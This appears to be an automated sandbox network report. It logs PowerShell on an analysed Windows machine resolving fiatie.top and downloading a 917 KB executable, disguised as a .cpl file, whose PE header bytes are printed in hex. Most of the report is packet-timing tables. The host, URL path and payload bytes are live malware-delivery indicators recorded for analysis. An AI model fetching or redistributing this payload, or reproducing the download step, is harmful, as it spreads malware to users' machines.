                                                                                            Dec 5, 2024 05:26:18.501192093 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.522521019 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.522546053 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.522609949 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.522627115 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.522697926 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.544624090 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.544651031 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.544713974 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.544737101 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.544754028 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.544779062 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.563659906 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.563685894 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.563738108 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.563747883 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.563786983 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.563808918 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.585694075 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.585716963 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.585767984 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.585789919 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.585803986 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.585834026 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.606353045 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.606373072 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.606466055 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.606479883 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.606518030 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.680749893 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.680778027 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.680835962 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.680876017 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.680892944 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.680999994 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.695645094 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.695674896 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.695733070 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.695769072 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.695776939 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.695864916 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.710072994 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.710094929 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.710160017 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.710186005 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.710201025 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.710248947 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.721977949 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.722002029 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.722029924 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.722038984 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.722115040 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.733678102 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.733700037 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.733736038 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.733745098 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.733772039 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.733792067 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.741400003 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.741415024 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.741478920 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.741508961 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.741575956 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.748811960 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.748827934 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.748878002 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.748897076 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.748999119 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.756539106 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.756560087 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.756612062 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.756618977 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.756669044 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.865958929 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.865988016 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.866048098 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.866082907 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.866099119 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.866167068 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.884368896 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.884391069 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.884443998 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.884479046 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.884491920 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.884531021 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.890849113 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.890883923 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.890928030 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.890958071 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.890974045 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.891000986 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.897397041 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.897418022 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.897455931 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.897485018 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.897497892 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.897556067 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.903228998 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.903245926 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.903295040 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.903331995 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.903351068 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.903753996 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.909708023 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.909723043 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.909775972 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.909802914 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.909816980 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.909836054 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.915958881 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.915982962 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.916040897 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.916065931 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.916080952 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.916105032 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.927725077 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.927747965 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.927819014 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:18.927834988 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:18.927870035 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.058177948 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.058208942 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.058268070 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.058298111 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.058314085 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.058429003 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.076359987 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.076380968 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.076440096 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.076457977 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.076476097 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.076489925 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.082822084 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.082838058 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.082899094 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.082906961 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.083003044 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.089440107 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.089456081 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.089514017 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.089519978 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.089572906 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.095139027 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.095155954 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.095213890 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.095221996 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.095266104 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.101773977 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.101793051 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.101861000 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.101869106 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.101950884 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.108031988 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.108059883 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.108113050 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.108119011 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.108153105 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.108174086 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.120372057 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.120398045 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.120444059 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.120455027 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.120484114 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.120501041 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.250193119 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.250220060 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.250279903 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.250308037 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.250322104 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.250350952 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.268335104 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.268366098 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.268448114 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.268470049 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.268485069 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.268507004 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.274872065 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.274902105 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.274945021 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.274964094 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.274996042 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.275015116 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.281351089 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.281375885 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.281455040 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.281464100 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.283771992 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.287152052 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.287177086 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.287239075 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.287245989 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.287266016 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.287285089 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.293755054 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.293782949 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.293828011 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.293836117 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.293863058 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.293886900 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.299942017 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.299973011 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.300015926 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.300024033 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.300052881 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.300074100 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.312737942 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.312766075 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.312819004 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.312832117 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.312868118 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.312879086 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.314939022 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.442945004 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.442971945 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.443031073 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.443067074 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.443082094 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.443150997 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.460478067 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.460505962 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.460555077 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.460568905 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.460598946 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.460608006 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.467025995 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.467053890 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.467093945 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.467101097 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.467122078 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.467140913 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.473444939 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.473479033 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.473517895 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.473525047 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.473561049 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.473583937 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.479242086 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.479266882 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.479317904 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.479322910 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.479360104 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.479367018 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.485817909 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.485847950 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.485882998 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.485889912 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.485914946 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.485934973 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.491987944 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.492012024 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.492048025 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.492053032 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.492088079 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.492119074 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.504575968 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.504606009 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.504667044 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.504672050 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.504683018 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.504710913 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.634279966 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.634308100 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.634367943 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.634403944 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.634421110 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.634562969 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.652381897 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.652401924 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.652486086 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.652533054 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.652582884 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.659075022 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.659094095 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.659157991 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.659192085 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.659213066 CET44349735103.253.43.248192.168.2.6
                                                                                            Dec 5, 2024 05:26:19.659250975 CET49735443192.168.2.6103.253.43.248
                                                                                            Dec 5, 2024 05:26:19.672010899 CET49735443192.168.2.6103.253.43.248
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 5, 2024 05:26:15.029788017 CET6355853192.168.2.61.1.1.1
                                                                                            Dec 5, 2024 05:26:15.427932978 CET53635581.1.1.1192.168.2.6
                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                            Dec 5, 2024 05:27:05.090225935 CET192.168.2.61.1.1.14d5aEcho
                                                                                            Dec 5, 2024 05:27:05.227261066 CET1.1.1.1192.168.2.6555aEcho Reply
                                                                                            Dec 5, 2024 05:27:06.834412098 CET192.168.2.61.1.1.14d59Echo
                                                                                            Dec 5, 2024 05:27:06.970940113 CET1.1.1.1192.168.2.65559Echo Reply
                                                                                            Dec 5, 2024 05:27:10.777848959 CET192.168.2.61.1.1.14d58Echo
                                                                                            Dec 5, 2024 05:27:10.914598942 CET1.1.1.1192.168.2.65558Echo Reply
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Dec 5, 2024 05:26:15.029788017 CET192.168.2.61.1.1.10x4bd3Standard query (0)fiatie.topA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Dec 5, 2024 05:26:15.427932978 CET1.1.1.1192.168.2.60x4bd3No error (0)fiatie.top103.253.43.248A (IP address)IN (0x0001)false
                                                                                            • fiatie.top
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.649735103.253.43.2484435588C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-05 04:26:17 UTC174OUTGET /seti/cnost5ty6y.cpl HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                            Host: fiatie.top
                                                                                            Connection: Keep-Alive
                                                                                            2024-12-05 04:26:18 UTC253INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.14.2
                                                                                            Date: Thu, 05 Dec 2024 04:26:17 GMT
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Length: 917440
                                                                                            Last-Modified: Sat, 30 Nov 2024 07:59:54 GMT
                                                                                            Connection: close
                                                                                            ETag: "674ac5fa-dffc0"
                                                                                            Accept-Ranges: bytes
                                                                                            2024-12-05 04:26:18 UTC16131INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 59 bc bb 1d 38 d2 e8 1d 38 d2 e8 1d 38 d2 e8 46 50 d1 e9 0f 38 d2 e8 46 50 d7 e9 a7 38 d2 e8 46 50 d6 e9 0a 38 d2 e8 4f 4d d6 e9 0c 38 d2 e8 4f 4d d1 e9 05 38 d2 e8 4f 4d d7 e9 42 38 d2 e8 d7 4d d7 e9 34 38 d2 e8 46 50 d4 e9 1c 38 d2 e8 46 50 d3 e9 12 38 d2 e8 1d 38 d3 e8 b0 38 d2 e8 d7 4d db e9 1c 38 d2 e8 d7 4d 2d e8 1c 38 d2 e8 1d 38 45 e8 1c 38 d2 e8 d7 4d d0 e9 1c 38 d2
                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$YY888FP8FP8FP8OM8OM8OMB8M48FP8FP888M8M-88E8M8
